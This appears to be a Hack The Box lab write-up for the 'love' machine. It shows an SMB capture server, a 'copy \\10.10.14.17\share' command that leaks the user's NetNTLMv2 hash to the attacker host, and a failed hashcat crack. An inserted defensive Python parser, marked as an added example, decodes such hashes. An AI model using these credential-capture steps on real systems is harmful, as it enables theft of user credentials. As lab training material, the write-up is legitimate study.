NTLM Relay


Upon gaining a foothold, I realized that the current session runs with the privileges of the phoebe user. Additionally, OutboundRestrictions is not set for the current system, so I will attempt to perform an NTLM relay attack to retrieve the current user's password hash.

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ simplesmb .                   
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Starting a local SMB server on Kali

c:\tmp> copy \\10.10.14.17\share\blah
The system cannot find the path specified.

Connecting

NetNTLMv2 hash retrieved

┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ hashcat --show phoebe.hash
 
5600 | NetNTLMv2 | Network Protocol
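
As an added example (not part of this writeup or of hashcat), a small Python parser for the line hashcat just identified as mode 5600: it splits `USER::DOMAIN:challenge:NTProofStr:blob`, decodes the NTLMv2 blob (MS-NLMP 2.2.2.7) to recover the timestamp and the target-info AV pairs, and flags the fixed `aaaaaaaaaaaaaaaa` server challenge seen in the capture above, which a real file server would never send. The sample line is constructed here to mirror the PHOEBE::LOVE capture; its NTProofStr, client challenge and AV values are placeholders.

```python
import struct
from datetime import datetime, timedelta, timezone
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
# AvId values from MS-NLMP 2.2.2.1 (AV_PAIR); string values are UTF-16LE
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp", 9: "TargetName"}
STRING_AV = {1, 2, 3, 4, 5, 9}

def filetime_from(ts: datetime) -> int:
    # FILETIME: 100 ns ticks since 1601-01-01 UTC (integer math avoids float rounding)
    d = ts - EPOCH_1601
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10

def parse_netntlmv2(line: str) -> dict:
    """Split a hashcat mode-5600 line and decode its NTLMv2_CLIENT_CHALLENGE blob."""
    user, empty, domain, challenge, proof, blob_hex = line.strip().split(":")
    if empty != "" or len(challenge) != 16 or len(proof) != 32:
        raise ValueError("not a NetNTLMv2 (hashcat 5600) line")
    blob = bytes.fromhex(blob_hex)
    # RespType, HiRespType, Reserved1, Reserved2, TimeStamp, ChallengeFromClient, Reserved3
    resp_type, hi_type, _, _, filetime, client_chal, _ = struct.unpack_from("<BBHIQ8sI", blob)
    if (resp_type, hi_type) != (1, 1):
        raise ValueError("unexpected NTLMv2 response type")
    av, off = {}, 28
    while True:  # AV_PAIR list, terminated by MsvAvEOL (AvId 0)
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:
            break
        raw = blob[off:off + av_len]
        av[AV_NAMES.get(av_id, f"AvId{av_id}")] = raw.decode("utf-16-le") if av_id in STRING_AV else raw.hex()
        off += av_len
    return {"user": user, "domain": domain, "server_challenge": challenge,
            "nt_proof": proof, "client_challenge": client_chal.hex(),
            "timestamp": EPOCH_1601 + timedelta(microseconds=filetime // 10),
            "target_info": av,
            "static_challenge": challenge == "aaaaaaaaaaaaaaaa"}  # fixed challenge: capture server

def build_sample(ts: datetime) -> str:
    """Constructed mode-5600 line mimicking the PHOEBE@LOVE capture above; not the real one."""
    ft = filetime_from(ts)
    av = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in
                  [(2, "LOVE".encode("utf-16-le")), (1, "LOVE".encode("utf-16-le")),
                   (7, struct.pack("<Q", ft)), (0, b"")])
    blob = struct.pack("<BBHIQ8sI", 1, 1, 0, 0, ft, bytes.fromhex("0123456789abcdef"), 0) + av + b"\0" * 4
    return f"PHOEBE::LOVE:aaaaaaaaaaaaaaaa:{'ab' * 16}:{blob.hex()}"

SAMPLE_TS = datetime(2023, 9, 16, 16, 58, 52, tzinfo=timezone.utc)  # constructed to match the session time above
SAMPLE = build_sample(SAMPLE_TS)
```

The decoded timestamp and NetBIOS names let a defender correlate a captured line with Windows 4624/4625 logon events on the victim and the SMB connection to the rogue share, which is the outbound traffic that Restrict NTLM: Outgoing NTLM traffic (the OutboundRestrictions setting noted above) would block.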
 
┌──(kali㉿kali)-[~/archive/htb/labs/love]
└─$ hashcat -a 0 -m 5600 phoebe.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
session..........: hashcat                                
status...........: Exhausted
hash.mode........: 5600 (NetNTLMv2)
hash.target......: PHOEBE::LOVE:aaaaaaaaaaaaaaaa:19f157be18ee6533fcf75...000000
time.started.....: Sat Sep 16 16:58:52 2023 (6 secs)
time.estimated...: Sat Sep 16 16:58:58 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:  2485.5 kH/s (0.79ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
progress.........: 14344385/14344385 (100.00%)
rejected.........: 0/14344385 (0.00%)
restore.point....: 14344385/14344385 (100.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
hardware.mon.#1..: Util: 62%
 
started: Sat Sep 16 16:58:51 2023
stopped: Sat Sep 16 16:58:59 2023

hashcat exhausted rockyou.txt without cracking the NetNTLMv2 hash.